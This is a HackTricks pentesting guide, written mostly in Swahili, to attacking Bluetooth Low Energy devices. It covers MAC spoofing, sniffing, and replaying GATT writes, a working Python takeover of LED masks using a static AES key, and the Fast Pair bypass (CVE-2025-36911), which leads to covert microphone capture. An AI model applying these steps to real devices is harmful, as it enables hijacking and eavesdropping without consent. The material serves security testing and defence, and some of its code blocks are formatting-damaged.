Pentesting BLE - Bluetooth Low Energy

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Introduction

Inapatikana tangu spesifikesheni ya Bluetooth 4.0, BLE inatumia tu channels 40, ikifunua anuwai ya 2400 hadi 2483.5 MHz. Kwa upande mwingine, Bluetooth ya jadi inatumia channels 79 katika anuwai ile ile.

Vifaa vya BLE huwasiliana kwa kutuma paketi za matangazo (advertising packets / beacons); paketi hizi zinatangaza uwepo wa kifaa cha BLE kwa vifaa vingine vilivyo karibu. Mara nyingine hizi beacons pia hutuma data.

Kifaa kinachosikiliza, kinachojulikana pia kama central device, kinaweza kujibu paketi ya matangazo kwa kutuma SCAN request iliyotumwa mahsusi kwa kifaa kilichoitangaza. Jibu la scan hilo linatumia muundo ule ule kama paketi ya advertising na taarifa za ziada ambazo hazikuweza kufunguliwa kwenye ombi la matangazo la awali, kama jina kamili la kifaa.

Byte ya preamble inalinganisha frequency, wakati access address ya byte nne ni connection identifier, inayotumika katika hali ambapo vifaa vingi vina jaribu kuanzisha connections kwenye channels zile zile. Ifuatayo, Protocol Data Unit (PDU) ina advertising data. Kuna aina kadhaa za PDU; zinazotumika zaidi ni ADV_NONCONN_IND na ADV_IND. Vifaa vinatumia aina ya PDU ADV_NONCONN_IND ikiwa havikubali connections, vinatuma data tu kupitia paketi za matangazo. Vifaa vinatumia ADV_IND ikiwa vinaruhusu connections na vinasimamisha kutuma paketi za matangazo mara connection imeanzishwa.

GATT

Generic Attribute Profile (GATT) inaelezea jinsi kifaa kinavyopaswa kuunda na kuhamisha data. Unapochambua attack surface ya kifaa cha BLE, mara nyingi utamwangalia GATT (au GATTs), kwa sababu ndiyo njia ambayo device functionality inachocheka na jinsi data inavyohifadhiwa, kuunganishwa, na kubadilishwa. GATT inaorodhesha characteristics (tabia), descriptors, na services za kifaa katika jedwali kama thamani za 16- au 32-bit. A characteristic ni thamani ya data inayotumwa kati ya central device na peripheral. Characteristics hizi zinaweza kuwa na descriptors zinazotoa taarifa za ziada kuhusu hizo characteristics. Characteristics mara nyingi huunganishwa katika services ikiwa zinahusiana na kutekeleza kitendo maalumu.

Enumeration

hciconfig #Check config, check if UP or DOWN
# If DOWN try:
sudo modprobe -c bluetooth
sudo hciconfig hci0 down && sudo hciconfig hci0 up

# Spoof MAC
spooftooph -i hci0 -a 11:22:33:44:55:66

GATTool

GATTool inaruhusu kuanzisha muunganisho na kifaa kingine, kuorodhesha sifa za kifaa hicho, na kusoma na kuandika atributi zake.
GATTTool inaweza kuanzisha interactive shell kwa chaguo la -I:

GATTTool interactive usage and examples

```bash gatttool -i hci0 -I [ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful [A4:CF:12:6C:B3:76][LE]> characteristics handle: 0x0002, char properties: 0x20, char value handle: 0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb handle: 0x0015, char properties: 0x02, char value handle: 0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb [...]

Write data

gatttool -i -b –char-write-req -n gatttool -b a4:cf:12:6c:b3:76 –char-write-req -a 0x002e -n $(echo -n “04dc54d9053b4307680a”|xxd -ps)

Read data

gatttool -i -b –char-read -a 0x16

Read connecting with an authenticated encrypted connection

gatttool –sec-level=high -b a4:cf:12:6c:b3:76 –char-read -a 0x002c

</details>

### Bettercap
```bash
# Start listening for beacons
sudo bettercap --eval "ble.recon on"
# Wait some time
>> ble.show # Show discovered devices
>> ble.enum <mac addr> # This will show the service, characteristics and properties supported

# Write data in a characteristic
>> ble.write <MAC ADDR> <UUID> <HEX DATA>
>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06

Sniffing na kudhibiti kwa nguvu vifaa vya BLE visivyo paired

Vifaa vingi vya pembeni vya BLE vya gharama nafuu havitekelezi pairing/bonding. Bila bonding, encryption ya Link Layer haizimwi kamwe, hivyo trafiki ya ATT/GATT iko wazi (cleartext). Off-path sniffer anaweza kufuatilia muunganisho, kufasiri GATT operations ili kutambua characteristic handles na values, na host yoyote iliyo karibu inaweza kisha kuungana na kurudia (replay) hizo writes ili kudhibiti kifaa.

Sniffing na Sniffle (CC26x2/CC1352)

Vifaa: Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) iliyoflashiwa tena kwa NCC Group’s Sniffle firmware.

Sakinisha Sniffle na Wireshark extcap yake kwenye Linux:

Sakinisha Sniffle extcap (Linux)

```bash if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then echo "[+] - Sniffle not installed! Installing at 1.10.0..." sudo mkdir -p /opt/sniffle sudo chown -R $USER:$USER /opt/sniffle pushd /opt/sniffle wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz tar xvf v1.10.0.tar.gz # Install Wireshark extcap for user and root only mkdir -p $HOME/.local/lib/wireshark/extcap ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap sudo mkdir -p /root/.local/lib/wireshark/extcap sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap popd else echo "[+] - Sniffle already installed at 1.10.0" fi ```

Flash Sonoff with Sniffle firmware (hakikisha kifaa chako cha serial kinalingana, kwa mfano /dev/ttyUSB0):

pushd /opt/sniffle/
wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex
git clone https://github.com/sultanqasim/cc2538-bsl.git
cd cc2538-bsl
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install pyserial intelhex
python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex
deactivate
popd

Kamata katika Wireshark kupitia extcap ya Sniffle na haraka pivot kwenda uandishi unaobadilisha hali kwa kuchuja:

_ws.col.info contains "Sent Write Command"

Hii inaonyesha ATT Write Commands kutoka kwa client; handle na value mara nyingi zinaendana moja kwa moja na vitendo vya kifaa (e.g., write 0x01 to a buzzer/alert characteristic, 0x00 to stop).

Mifano ya haraka ya Sniffle CLI:

python3 scanner.py --output scan.pcap
# Only devices with very strong signal
python3 scanner.py --rssi -40
# Filter advertisements containing a string
python3 sniffer.py --string "banana" --output sniff.pcap

Mbadala sniffer: Nordic’s nRF Sniffer for BLE + Wireshark plugin pia inafanya kazi. Kwenye dongles za Nordic ndogo/za bei nafuu kawaida unafunika (overwrite) USB bootloader ili kupakia sniffer firmware, hivyo au unabaki na dongle maalum la sniffer au unahitaji J-Link/JTAG ili kurejesha bootloader baadaye.

Udhibiti hai kupitia GATT

Mara tu utakapotambua writable characteristic handle na value kutoka kwa sniffed traffic, ungana kama central yoyote na fanya write ile ile:

Kwa kutumia Nordic nRF Connect for Desktop (BLE app):
Chagua nRF52/nRF52840 dongle, scan na uunganishe kwenye target.
Vinjari database ya GATT, tafuta target characteristic (mara nyingi ina jina la kirafiki, mfano, Alert Level).
Fanya Write na sniffed bytes (mfano, 01 kuanzisha, 00 kusimamisha).
Automatisha kwenye Windows na Nordic dongle ukitumia Python + blatann:

Mfano wa Python blatann write (Windows + Nordic dongle)

```python import time import blatann

CONFIG

COM_PORT = “COM29” # Replace with your COM port TARGET_MAC = “5B:B1:7F:47:A7:00” # Replace with your target MAC

target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + “,p”)

CONNECT

ble_device = blatann.BleDevice(COM_PORT) ble_device.configure() ble_device.open() print(f“[-] Connecting to {TARGET_MAC}…“) peer = ble_device.connect(target_address).wait() if not peer: print(”[!] Connection failed.“) ble_device.close() raise SystemExit(1)

print(“Connected. Discovering services…”) peer.discover_services().wait(5, exception_on_timeout=False)

Example: write 0x01/0x00 to a known handle

for service in peer.database.services: for ch in service.characteristics: if ch.handle == 0x000b: # Replace with your handle print(“[!] Beeping.”) ch.write(b“\x01“) time.sleep(2) print(“[+] And relax.”) ch.write(b“\x00“)

print(“[-] Disconnecting…”) peer.disconnect() peer.wait_for_disconnect() ble_device.close()

</details>

### Kesi ya mfano: kuchukua udhibiti wa BLE LED maski (Shining Mask family)

Maski za LED za BLE za bei nafuu, zenye lebo nyeupe zinazodhibitiwa na app ya “Shining Mask” zinakubali udhibiti wa kuandika kutoka kwa central yoyote iliyokaribu bila pairing/bonding. App inatumia GATT kuwasiliana na command characteristic na data characteristic; commands zinasimbwa kwa AES‑ECB kwa static key iliyowekwa ndani ya app, wakati data kubwa ya picha haijasimbwa.

Key UUIDs kwenye vifaa hivi:
- Command write characteristic: d44bc439-abfd-45a2-b575-925416129600
- Notify characteristic: d44bc439-abfd-45a2-b575-925416129601
- Image data characteristic: d44bc439-abfd-45a2-b575-92541612960a

Unauthenticated GATT writes
- Hakuna pairing/bonding inayohitajika. Host yoyote anaweza kuungana na kuandika kwa command UUID kubadilisha brightness, kuchagua images, kuanzisha animations, nk.
- Operesheni za kawaida zilizobainika: LIGHT (brightness), IMAG (select index), DELE (delete indices), SPEED, ANIM, PLAY, CHEC (query count), DATS (begin upload).

Static-key AES command framing
- Frame = 1‑byte length, ASCII op (e.g., b"LIGHT"), args, pad to 16, AES‑ECB encrypt with static key from the app.
- Known static key (hex): 32672f7974ad43451d9c6c894a0e8764

Python helper to encrypt and send a command (example: set max brightness):
```python
from Crypto.Cipher import AES
from binascii import unhexlify

KEY = unhexlify('32672f7974ad43451d9c6c894a0e8764')

def enc_cmd(op, args=b''):
body = bytes([len(op) + len(args)]) + op.encode() + args
body += b'\x00' * ((16 - (len(body) % 16)) % 16)
return AES.new(KEY, AES.MODE_ECB).encrypt(body)

packet = enc_cmd('LIGHT', b'\xff')
# Write 'packet' to d44bc439-abfd-45a2-b575-925416129600

Mtiririko wa upakiaji wa picha

Baada ya handshake ya DATS iliyosimbwa, vipande ghafi vinaandikwa bila kusimbwa kwenye data characteristic …960a.
Kimuundo cha paketi: [len][seq][payload]. Kulingana na uzoefu, takriban ~100 bytes za payload kwa pakiti zinafanya kazi kwa uaminifu.

Pseudocode ndogo ya upakiaji wa picha

```python # Start upload (encrypted): two bytes size, two bytes index, one toggle byte img_index = b'\x01\x00' # index 1 img_size = (len(img_bytes)).to_bytes(2, 'big') start = enc_cmd('DATS', img_size + img_index + b'\x01') write_cmd_char(start) # expect DATSOK on notify char

Stream raw chunks (unencrypted) to …960a: [len][seq][payload]

seq = 0 CHUNK = 98 # data bytes per packet (≈100 total incl. len+seq) for off in range(0, len(img_bytes), CHUNK): chunk = img_bytes[off:off+CHUNK] pkt = bytes([len(chunk)+1, seq & 0xff]) + chunk write_data_char(pkt) seq += 1

Optionally signal completion if firmware expects it (e.g., DATCP)

</details>

### Fast Pair (0xFE2C) Key-Based Pairing signature bypass (WhisperPair/CVE-2025-36911)

- **Uchunguzi:** Scan BLE advertisements for **service UUID 0xFE2C** (Google Fast Pair). Vifaa vilivyo katika pairing mode kwa kawaida vinaonyesha pairing badge; hata nje ya pairing mode huduma ya Fast Pair inaweza kujibu GATT.
- **Jaribio lisiloingilia (signature enforcement check):**
1. GATT **connect** kwa huduma ya Fast Pair na **read the Model ID**.
2. **Write a Key-Based Pairing (KBP) value without a signature**. Ikiwa peripheral inakubali unsigned KBP write, ni nyeti kwa signature-bypass (WhisperPair/CVE-2025-36911). Kukataliwa kunaonyesha imepachikwa; kushindwa kunaweza kuwa hakitokei ikiwa tayari imepaired.
- **BLE → BR/EDR pivot:** Tuma **KBP Request** na parsia **encrypted response** ili kupata anwani ya lengo **BR/EDR address**. Tumia classic bonding call (mf., Android **`createBond(<BR/EDR address>)`**) kumaliza pairing isiyoidhinishwa. Pale inapoungwa mkono, kuandika **Account Key** huhifadhi ushirikiano.
- **Matumizi ya mikrofono baada ya bonding:** Baada ya bonding, fungua **HFP** na anzisha **SCO audio** kupata stream ya mikrofono ya moja kwa moja kwa kusikiliza/kuandika (mf., kuhifadhi M4A). Mlolongo huu hubadilisha ukubali wa unsigned KBP kuwa kunasa sauti ya mbali bila idhini ya mtumiaji.
- **Kuchunguza/kutambua:** Tafuta Fast Pair GATT traffic ikifuatiwa mara moja na classic **bonding attempts to the BR/EDR address returned in KBP**, na kwa **KBP writes** zisizo na signature. Kufanya validation ya signature kwenye KBP na kuonyesha prompt ya user-confirmed pairing kunavunja mlolongo.

## Operational notes

- Tumia Sonoff+Sniffle kwenye Linux kwa channel hopping thabiti na kufuatilia connections. Weka sniffer ya Nordic ya ziada kama backup.
- Bila pairing/bonding, mshambuliaji yeyote aliye karibu anaweza kuona writes na kureplay/kuunda zao ili kuandika kwa characteristics zinazoweza kuandikwa bila uthibitisho.

## References

- [WPair — CVE-2025-36911 (WhisperPair) vulnerability scanner & research tool](https://github.com/zalexdev/wpair-app)
- [Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/)
- [Sniffle – A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle)
- [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle)
- [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p)
- [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE)
- [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop)
- [blatann – Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/)
- [Invasion of the Face Changers: Halloween Hijinks with Bluetooth LED Masks (Bishop Fox)](https://bishopfox.com/blog/invasion-of-the-face-changers-halloween-hijinks-with-bluetooth-led-masks)
- [Shining Mask BLE protocol notes (BrickCraftDream)](https://github.com/BrickCraftDream/Shining-Mask-stuff/blob/main/ble-protocol.md)
- [Android Bluetooth HCI snoop logging](https://source.android.com/docs/core/connect/bluetooth/verifying_debugging)
- [Adafruit Feather nRF52840 Express](https://www.adafruit.com/product/4062)

> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
> </details>